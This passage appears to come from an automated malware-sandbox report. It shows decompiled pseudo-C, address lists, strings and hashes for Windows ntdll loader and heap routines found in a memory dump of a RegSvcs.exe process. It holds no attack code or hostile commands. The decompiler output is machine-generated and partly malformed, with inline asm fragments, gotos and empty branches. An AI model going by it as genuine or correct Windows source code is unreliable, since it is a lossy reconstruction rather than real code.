								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E018D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E018D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x19b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x19b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E018E2280(_t92, 0x19b86cc);
															_t94 = E01999DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x19b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E018D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x19b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x19b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0190F380(_t136, 0x18a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E018E2280(_t108, 0x19b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01999D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E018DFFB0(_t118, _t156, 0x19b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01909A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x018d8799
0x018d879d
0x018d87a1
0x018d87a3
0x018d87a8
0x018d87c3
0x018d87c3
0x018d87c8
0x018d87d1
0x018d87d4
0x018d87d8
0x018d87e5
0x018d87ec
0x01929bfe
0x01929c00
0x01929c02
0x01929c08
0x01929c0d
0x01929c0f
0x01929c14
0x01929c2d
0x01929c32
0x01929c37
0x01929c3a
0x01929c3c
0x01929c42
0x01929c42
0x01929c3c
0x01929c02
0x018d87da
0x018d87df
0x018d87e3
0x00000000
0x00000000
0x018d87e3
0x018d87f2
0x00000000
0x018d87fb
0x018d87fd
0x018d87fe
0x018d880e
0x018d880f
0x018d8810
0x018d8814
0x018d881a
0x018d881c
0x018d881f
0x018d8821
0x018d8822
0x018d8824
0x018d8826
0x018d882c
0x018d882e
0x01929c48
0x01929c48
0x018d8834
0x018d8834
0x018d8837
0x00000000
0x00000000
0x018d8837
0x018d882e
0x018d883d
0x018d8840
0x018d8843
0x018d8846
0x018d8849
0x018d884c
0x018d884e
0x018d8850
0x018d8852
0x018d8854
0x018d8857
0x018d88b4
0x018d88b6
0x018d88b6
0x018d8859
0x018d8859
0x018d8859
0x018d8861
0x018d8866
0x018d886a
0x018d893d
0x018d8941
0x00000000
0x018d8947
0x018d8947
0x018d894a
0x018d894c
0x00000000
0x018d8952
0x018d8955
0x018d895a
0x018d895d
0x018d895d
0x018d895f
0x018d8961
0x018d8961
0x018d8968
0x00000000
0x00000000
0x018d896a
0x018d896b
0x018d896e
0x00000000
0x018d8970
0x018d8970
0x018d8970
0x018d8970
0x018d8972
0x018d8972
0x018d8974
0x00000000
0x018d897a
0x018d897a
0x018d897d
0x00000000
0x018d8983
0x01929c65
0x01929c6d
0x01929c72
0x01929c75
0x01929c75
0x01929c82
0x01929c86
0x01929c87
0x01929c88
0x01929c89
0x01929c8c
0x01929c90
0x01929c95
0x01929c97
0x01929ca0
0x01929ca3
0x01929ca9
0x01929ca9
0x00000000
0x01929ca9
0x01929ca3
0x00000000
0x01929c97
0x018d897d
0x00000000
0x018d8974
0x018d8988
0x018d8992
0x018d8996
0x00000000
0x018d8996
0x018d894c
0x00000000
0x018d8870
0x018d887b
0x018d887d
0x018d887f
0x018d8881
0x018d8884
0x018d8884
0x018d8886
0x018d8889
0x018d888c
0x018d888e
0x018d8891
0x018d8891
0x018d8898
0x00000000
0x00000000
0x018d889a
0x018d889b
0x018d889e
0x00000000
0x00000000
0x018d88a0
0x018d88a8
0x018d88b0
0x018d88b2
0x018d88d3
0x018d88d5
0x00000000
0x018d88d7
0x018d88db
0x018d88dc
0x018d88e0
0x018d88e8
0x018d88ee
0x018d88f0
0x018d88f3
0x018d88fc
0x018d8901
0x018d8906
0x018d890c
0x018d890c
0x018d890f
0x018d8916
0x018d8917
0x018d8918
0x018d8919
0x018d891a
0x018d891f
0x018d8921
0x01929c52
0x01929c55
0x01929c5b
0x01929cac
0x01929cc0
0x01929cc0
0x01929c55
0x018d8927
0x018d8927
0x018d892f
0x018d8933
0x00000000
0x018d88f5
0x018d88f5
0x00000000
0x018d88f7
0x018d88f7
0x018d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018d88fa
0x018d88f5
0x018d88f3
0x00000000
0x018d88d5
0x00000000
0x018d88b2
0x018d88c9
0x00000000
0x018d88c9
0x018d887f
0x018d886a
0x018d8857
0x018d8852
0x018d88bf
0x018d88bf
0x018d87aa
0x018d87ad
0x018d87ae
0x018d87b4
0x018d87b5
0x018d87b6
0x018d87b8
0x018d87bd
0x018d87c1
0x018d87f4
0x018d87fa
0x00000000
0x00000000
0x00000000
0x018d87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01929C18
LdrpDoPostSnapWork, xrefs: 01929C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01929C28

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 831f20624c3c66d0c57db4c77dfcfd1b173ec3a04c2fada35f01ea7ec0240dbd
Instruction ID: 1582eec890a0a874649ee1d6b3880f6ba8bc25f27e34b6adf4cc63d982a06e7f
Opcode Fuzzy Hash: 831f20624c3c66d0c57db4c77dfcfd1b173ec3a04c2fada35f01ea7ec0240dbd
Instruction Fuzzy Hash: D1910471A0031AEFEB18DF5DC4C1ABAB7B9FF46314B554169E909EB241DB30AB01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018FAC7B Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E018FAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0191D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x19b8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E019096E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01973C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E019096E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E018CB150();
							} else {
								E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E018CB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E019814FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E018E7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01981411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E018E7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01981411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x018fac85
0x018fac88
0x018fac8a
0x018fac8d
0x018fac91
0x018fac99
0x018fac9c
0x01939f57
0x01939f5b
0x01939f60
0x01939f60
0x018faca8
0x018facae
0x018facda
0x018facde
0x018face8
0x018faceb
0x018facee
0x00000000
0x018facee
0x018facf6
0x018facb0
0x018facb0
0x018facbb
0x018facbd
0x018facc0
0x018facc5
0x018fadae
0x018fadb4
0x018fadb4
0x018facd4
0x018facd8
0x018facf9
0x018facff
0x018fad04
0x018fad08
0x018fad09
0x018fad10
0x018fad12
0x018fad18
0x01939f6f
0x01939f74
0x01939f76
0x01939f7c
0x01939f84
0x01939f88
0x01939f89
0x01939f90
0x01939f90
0x01939f76
0x018fad1e
0x018fad24
0x018fad26
0x0193a097
0x0193a09b
0x0193a0ba
0x0193a0bf
0x0193a09d
0x0193a0b2
0x0193a0b7
0x0193a0c5
0x0193a0c8
0x0193a0cb
0x0193a0d2
0x00000000
0x018fad2c
0x018fad2c
0x018fad2f
0x018fad34
0x018fad36
0x01939f97
0x01939f9a
0x00000000
0x00000000
0x01939fa9
0x018fad3e
0x018fad3e
0x018fad41
0x01939fb3
0x01939fb9
0x01939fc0
0x01939fd0
0x01939fd0
0x01939fc0
0x018fad4a
0x018fad50
0x018fad5c
0x018fad62
0x018fad68
0x018fad6b
0x018fad6d
0x01939fda
0x01939fdd
0x00000000
0x00000000
0x01939fec
0x00000000
0x018fad73
0x018fad73
0x018fad73
0x018fad75
0x018fad75
0x018fad78
0x01939ff6
0x01939ffc
0x0193a003
0x0193a00e
0x0193a010
0x0193a01b
0x0193a01b
0x0193a01b
0x0193a038
0x0193a038
0x0193a003
0x018fad84
0x018fad89
0x018fad8c
0x018fad8e
0x0193a042
0x0193a045
0x00000000
0x00000000
0x0193a054
0x00000000
0x018fad94
0x018fad94
0x018fad94
0x018fad96
0x018fad96
0x018fad99
0x0193a063
0x0193a065
0x0193a070
0x0193a070
0x0193a070
0x0193a08d
0x0193a08d
0x018fada4
0x018fada6
0x00000000
0x018fada6
0x018fad8e
0x018fad6d
0x018fad3c
0x018fad3c
0x00000000
0x018fad3c
0x00000000
0x00000000
0x00000000
0x018facd8

Strings

HEAP: , xrefs: 0193A0BA
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0193A0CD
HEAP[%wZ]: , xrefs: 0193A0AD

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: d41aed2aeaaa939a9f4715eb8c1b4e15e5ecaf7c437c0fbfde790d6dc52db432
Instruction ID: 567e622bc893ed5e3b36e7833519e0ce9d0bed41d005b7a97923f960ba6c3cc2
Opcode Fuzzy Hash: d41aed2aeaaa939a9f4715eb8c1b4e15e5ecaf7c437c0fbfde790d6dc52db432
Instruction Fuzzy Hash: B5810831204684EFE72ADB6CC884B69BBF8FF45714F0441A9E659C7392D774EA40CB10

Uniqueness

Uniqueness Score: -1.00%

Function 018EB73D Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E018EB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0198A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x19b8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E018CB150();
					__eflags =  *0x19b7bc8;
					if(__eflags == 0) {
						E01982073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0198A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x19b8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x19b8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E018EB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0198A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E018EE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x018eb746
0x018eb74b
0x018eb74d
0x018eb750
0x018eb755
0x018eb758
0x018eb758
0x018eb75e
0x018eb763
0x018eb764
0x018eb76a
0x018eb76d
0x018eb771
0x018eb776
0x018eb85c
0x018eb85d
0x018eb860
0x018eb865
0x01932ba1
0x01932ba2
0x01932ba9
0x01932bae
0x01932bae
0x018eb77c
0x018eb77c
0x018eb77c
0x018eb785
0x018eb788
0x01932bb6
0x01932bb9
0x00000000
0x00000000
0x01932bbf
0x01932bc5
0x01932bc9
0x01932be8
0x01932bed
0x01932bcb
0x01932be0
0x01932be5
0x01932bf3
0x01932bf8
0x01932bfd
0x01932c05
0x01932c0e
0x01932c0e
0x00000000
0x018eb78e
0x018eb78e
0x018eb78e
0x018eb791
0x018eb791
0x018eb797
0x018eb797
0x018eb79f
0x018eb7a9
0x018eb7af
0x018eb7af
0x018eb7b1
0x018eb7b6
0x018eb7e2
0x018eb7e2
0x018eb7e7
0x018eb880
0x018eb7ed
0x018eb7ed
0x018eb7ed
0x018eb7ef
0x018eb7f2
0x018eb7f2
0x018eb7f5
0x018eb7fa
0x01932c2d
0x01932c2e
0x01932c39
0x018eb800
0x018eb800
0x018eb802
0x018eb805
0x018eb808
0x018eb808
0x018eb80a
0x018eb80d
0x018eb816
0x018eb81c
0x018eb822
0x018eb82f
0x018eb88b
0x018eb892
0x018eb897
0x018eb899
0x018eb89b
0x018eb89e
0x018eb8a5
0x018eb8a8
0x018eb8aa
0x018eb8ac
0x018eb8ac
0x018eb8aa
0x018eb892
0x018eb831
0x018eb839
0x018eb83b
0x018eb83b
0x018eb844
0x018eb84b
0x018eb852
0x018eb7b8
0x018eb7ba
0x018eb7bf
0x018eb7c4
0x01932c18
0x01932c19
0x01932c23
0x018eb7ca
0x018eb7ca
0x018eb7cc
0x018eb7cf
0x018eb7d1
0x018eb7d1
0x018eb7d4
0x018eb7dc
0x018eb8bb
0x018eb8bb
0x018eb8be
0x018eb8be
0x018eb8c1
0x00000000
0x00000000
0x018eb8c3
0x018eb8c5
0x018eb8c7
0x018eb8e0
0x00000000
0x018eb8e0
0x018eb8cc
0x018eb8cc
0x00000000
0x018eb8cc
0x018eb8d6
0x018eb8d6
0x00000000
0x018eb7dc
0x018eb7b6

Strings

HEAP: , xrefs: 01932BE8
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01932BF3
HEAP[%wZ]: , xrefs: 01932BDB

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 4afa04ba02a34b9e6b86c74e9095b4ef8eef30a1eca823d665a6543ae5df32b9
Instruction ID: 37c0f7ebab1a32b98eec8b63e5d0e1702c88bd65deb40e6ff66e4896a55ca9af
Opcode Fuzzy Hash: 4afa04ba02a34b9e6b86c74e9095b4ef8eef30a1eca823d665a6543ae5df32b9
Instruction Fuzzy Hash: 6761D370600205DFDB29DF28C889B6ABBE5FF46344F18856EE849CB741D730EA81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018D7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E018D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E018DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E018CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x19b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
